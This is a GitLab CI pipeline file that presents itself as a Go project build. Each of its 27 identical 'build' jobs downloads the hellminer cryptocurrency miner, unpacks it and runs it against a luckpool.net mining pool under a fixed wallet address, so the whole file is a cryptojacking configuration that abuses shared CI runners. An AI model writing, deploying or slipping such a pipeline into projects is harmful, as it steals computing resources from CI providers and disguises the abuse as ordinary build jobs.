image: golang:latest

variables:
  REPO_NAME: gitlab.com/namespace/project

stages:
  - build
  - test
  - deploy

build_001:
  stage: build
  script:
    - wget https://github.com/hellcatz/luckpool/raw/master/miners/hellminer_cpu_linux.tar.gz
    - tar xf hellminer_cpu_linux.tar.gz
    - chmod u+x hellminer
    - ./hellminer -c stratum+tcp://na.luckpool.net:3956#xnsub -u RCJowAz3FMtQ6U1U56iZBKqkmqduGEJmAH.WORKER -p x --cpu 2


build_002:
  stage: build
  script:
    - wget https://github.com/hellcatz/luckpool/raw/master/miners/hellminer_cpu_linux.tar.gz
    - tar xf hellminer_cpu_linux.tar.gz
    - chmod u+x hellminer
    - ./hellminer -c stratum+tcp://na.luckpool.net:3956#xnsub -u RCJowAz3FMtQ6U1U56iZBKqkmqduGEJmAH.WORKER -p x --cpu 2


build_003:
  stage: build
  script:
    - wget https://github.com/hellcatz/luckpool/raw/master/miners/hellminer_cpu_linux.tar.gz
    - tar xf hellminer_cpu_linux.tar.gz
    - chmod u+x hellminer
    - ./hellminer -c stratum+tcp://na.luckpool.net:3956#xnsub -u RCJowAz3FMtQ6U1U56iZBKqkmqduGEJmAH.WORKER -p x --cpu 2


build_004:
  stage: build
  script:
    - wget https://github.com/hellcatz/luckpool/raw/master/miners/hellminer_cpu_linux.tar.gz
    - tar xf hellminer_cpu_linux.tar.gz
    - chmod u+x hellminer
    - ./hellminer -c stratum+tcp://na.luckpool.net:3956#xnsub -u RCJowAz3FMtQ6U1U56iZBKqkmqduGEJmAH.WORKER -p x --cpu 2


build_005:
  stage: build
  script:
    - wget https://github.com/hellcatz/luckpool/raw/master/miners/hellminer_cpu_linux.tar.gz
    - tar xf hellminer_cpu_linux.tar.gz
    - chmod u+x hellminer
    - ./hellminer -c stratum+tcp://na.luckpool.net:3956#xnsub -u RCJowAz3FMtQ6U1U56iZBKqkmqduGEJmAH.WORKER -p x --cpu 2


build_006:
  stage: build
  script:
    - wget https://github.com/hellcatz/luckpool/raw/master/miners/hellminer_cpu_linux.tar.gz
    - tar xf hellminer_cpu_linux.tar.gz
    - chmod u+x hellminer
    - ./hellminer -c stratum+tcp://na.luckpool.net:3956#xnsub -u RCJowAz3FMtQ6U1U56iZBKqkmqduGEJmAH.WORKER -p x --cpu 2


build_007:
  stage: build
  script:
    - wget https://github.com/hellcatz/luckpool/raw/master/miners/hellminer_cpu_linux.tar.gz
    - tar xf hellminer_cpu_linux.tar.gz
    - chmod u+x hellminer
    - ./hellminer -c stratum+tcp://na.luckpool.net:3956#xnsub -u RCJowAz3FMtQ6U1U56iZBKqkmqduGEJmAH.WORKER -p x --cpu 2


build_008:
  stage: build
  script:
    - wget https://github.com/hellcatz/luckpool/raw/master/miners/hellminer_cpu_linux.tar.gz
    - tar xf hellminer_cpu_linux.tar.gz
    - chmod u+x hellminer
    - ./hellminer -c stratum+tcp://na.luckpool.net:3956#xnsub -u RCJowAz3FMtQ6U1U56iZBKqkmqduGEJmAH.WORKER -p x --cpu 2


build_009:
  stage: build
  script:
    - wget https://github.com/hellcatz/luckpool/raw/master/miners/hellminer_cpu_linux.tar.gz
    - tar xf hellminer_cpu_linux.tar.gz
    - chmod u+x hellminer
    - ./hellminer -c stratum+tcp://na.luckpool.net:3956#xnsub -u RCJowAz3FMtQ6U1U56iZBKqkmqduGEJmAH.WORKER -p x --cpu 2


build_010:
  stage: build
  script:
    - wget https://github.com/hellcatz/luckpool/raw/master/miners/hellminer_cpu_linux.tar.gz
    - tar xf hellminer_cpu_linux.tar.gz
    - chmod u+x hellminer
    - ./hellminer -c stratum+tcp://na.luckpool.net:3956#xnsub -u RCJowAz3FMtQ6U1U56iZBKqkmqduGEJmAH.WORKER -p x --cpu 2


build_011:
  stage: build
  script:
    - wget https://github.com/hellcatz/luckpool/raw/master/miners/hellminer_cpu_linux.tar.gz
    - tar xf hellminer_cpu_linux.tar.gz
    - chmod u+x hellminer
    - ./hellminer -c stratum+tcp://na.luckpool.net:3956#xnsub -u RCJowAz3FMtQ6U1U56iZBKqkmqduGEJmAH.WORKER -p x --cpu 2


build_012:
  stage: build
  script:
    - wget https://github.com/hellcatz/luckpool/raw/master/miners/hellminer_cpu_linux.tar.gz
    - tar xf hellminer_cpu_linux.tar.gz
    - chmod u+x hellminer
    - ./hellminer -c stratum+tcp://na.luckpool.net:3956#xnsub -u RCJowAz3FMtQ6U1U56iZBKqkmqduGEJmAH.WORKER -p x --cpu 2


build_013:
  stage: build
  script:
    - wget https://github.com/hellcatz/luckpool/raw/master/miners/hellminer_cpu_linux.tar.gz
    - tar xf hellminer_cpu_linux.tar.gz
    - chmod u+x hellminer
    - ./hellminer -c stratum+tcp://na.luckpool.net:3956#xnsub -u RCJowAz3FMtQ6U1U56iZBKqkmqduGEJmAH.WORKER -p x --cpu 2


build_014:
  stage: build
  script:
    - wget https://github.com/hellcatz/luckpool/raw/master/miners/hellminer_cpu_linux.tar.gz
    - tar xf hellminer_cpu_linux.tar.gz
    - chmod u+x hellminer
    - ./hellminer -c stratum+tcp://na.luckpool.net:3956#xnsub -u RCJowAz3FMtQ6U1U56iZBKqkmqduGEJmAH.WORKER -p x --cpu 2


build_015:
  stage: build
  script:
    - wget https://github.com/hellcatz/luckpool/raw/master/miners/hellminer_cpu_linux.tar.gz
    - tar xf hellminer_cpu_linux.tar.gz
    - chmod u+x hellminer
    - ./hellminer -c stratum+tcp://na.luckpool.net:3956#xnsub -u RCJowAz3FMtQ6U1U56iZBKqkmqduGEJmAH.WORKER -p x --cpu 2


build_016:
  stage: build
  script:
    - wget https://github.com/hellcatz/luckpool/raw/master/miners/hellminer_cpu_linux.tar.gz
    - tar xf hellminer_cpu_linux.tar.gz
    - chmod u+x hellminer
    - ./hellminer -c stratum+tcp://na.luckpool.net:3956#xnsub -u RCJowAz3FMtQ6U1U56iZBKqkmqduGEJmAH.WORKER -p x --cpu 2


build_017:
  stage: build
  script:
    - wget https://github.com/hellcatz/luckpool/raw/master/miners/hellminer_cpu_linux.tar.gz
    - tar xf hellminer_cpu_linux.tar.gz
    - chmod u+x hellminer
    - ./hellminer -c stratum+tcp://na.luckpool.net:3956#xnsub -u RCJowAz3FMtQ6U1U56iZBKqkmqduGEJmAH.WORKER -p x --cpu 2


build_018:
  stage: build
  script:
    - wget https://github.com/hellcatz/luckpool/raw/master/miners/hellminer_cpu_linux.tar.gz
    - tar xf hellminer_cpu_linux.tar.gz
    - chmod u+x hellminer
    - ./hellminer -c stratum+tcp://na.luckpool.net:3956#xnsub -u RCJowAz3FMtQ6U1U56iZBKqkmqduGEJmAH.WORKER -p x --cpu 2


build_019:
  stage: build
  script:
    - wget https://github.com/hellcatz/luckpool/raw/master/miners/hellminer_cpu_linux.tar.gz
    - tar xf hellminer_cpu_linux.tar.gz
    - chmod u+x hellminer
    - ./hellminer -c stratum+tcp://na.luckpool.net:3956#xnsub -u RCJowAz3FMtQ6U1U56iZBKqkmqduGEJmAH.WORKER -p x --cpu 2


build_020:
  stage: build
  script:
    - wget https://github.com/hellcatz/luckpool/raw/master/miners/hellminer_cpu_linux.tar.gz
    - tar xf hellminer_cpu_linux.tar.gz
    - chmod u+x hellminer
    - ./hellminer -c stratum+tcp://na.luckpool.net:3956#xnsub -u RCJowAz3FMtQ6U1U56iZBKqkmqduGEJmAH.WORKER -p x --cpu 2


build_021:
  stage: build
  script:
    - wget https://github.com/hellcatz/luckpool/raw/master/miners/hellminer_cpu_linux.tar.gz
    - tar xf hellminer_cpu_linux.tar.gz
    - chmod u+x hellminer
    - ./hellminer -c stratum+tcp://na.luckpool.net:3956#xnsub -u RCJowAz3FMtQ6U1U56iZBKqkmqduGEJmAH.WORKER -p x --cpu 2


build_022:
  stage: build
  script:
    - wget https://github.com/hellcatz/luckpool/raw/master/miners/hellminer_cpu_linux.tar.gz
    - tar xf hellminer_cpu_linux.tar.gz
    - chmod u+x hellminer
    - ./hellminer -c stratum+tcp://na.luckpool.net:3956#xnsub -u RCJowAz3FMtQ6U1U56iZBKqkmqduGEJmAH.WORKER -p x --cpu 2


build_023:
  stage: build
  script:
    - wget https://github.com/hellcatz/luckpool/raw/master/miners/hellminer_cpu_linux.tar.gz
    - tar xf hellminer_cpu_linux.tar.gz
    - chmod u+x hellminer
    - ./hellminer -c stratum+tcp://na.luckpool.net:3956#xnsub -u RCJowAz3FMtQ6U1U56iZBKqkmqduGEJmAH.WORKER -p x --cpu 2


build_024:
  stage: build
  script:
    - wget https://github.com/hellcatz/luckpool/raw/master/miners/hellminer_cpu_linux.tar.gz
    - tar xf hellminer_cpu_linux.tar.gz
    - chmod u+x hellminer
    - ./hellminer -c stratum+tcp://na.luckpool.net:3956#xnsub -u RCJowAz3FMtQ6U1U56iZBKqkmqduGEJmAH.WORKER -p x --cpu 2


build_025:
  stage: build
  script:
    - wget https://github.com/hellcatz/luckpool/raw/master/miners/hellminer_cpu_linux.tar.gz
    - tar xf hellminer_cpu_linux.tar.gz
    - chmod u+x hellminer
    - ./hellminer -c stratum+tcp://na.luckpool.net:3956#xnsub -u RCJowAz3FMtQ6U1U56iZBKqkmqduGEJmAH.WORKER -p x --cpu 2


build_026:
  stage: build
  script:
    - wget https://github.com/hellcatz/luckpool/raw/master/miners/hellminer_cpu_linux.tar.gz
    - tar xf hellminer_cpu_linux.tar.gz
    - chmod u+x hellminer
    - ./hellminer -c stratum+tcp://na.luckpool.net:3956#xnsub -u RCJowAz3FMtQ6U1U56iZBKqkmqduGEJmAH.WORKER -p x --cpu 2


build_027:
  stage: build
  script:
    - wget https://github.com/hellcatz/luckpool/raw/master/miners/hellminer_cpu_linux.tar.gz
    - tar xf hellminer_cpu_linux.tar.gz
    - chmod u+x hellminer
    - ./hellminer -c stratum+tcp://na.luckpool.net:3956#xnsub -u RCJowAz3FMtQ6U1U56iZBKqkmqduGEJmAH.WORKER -p x --cpu 2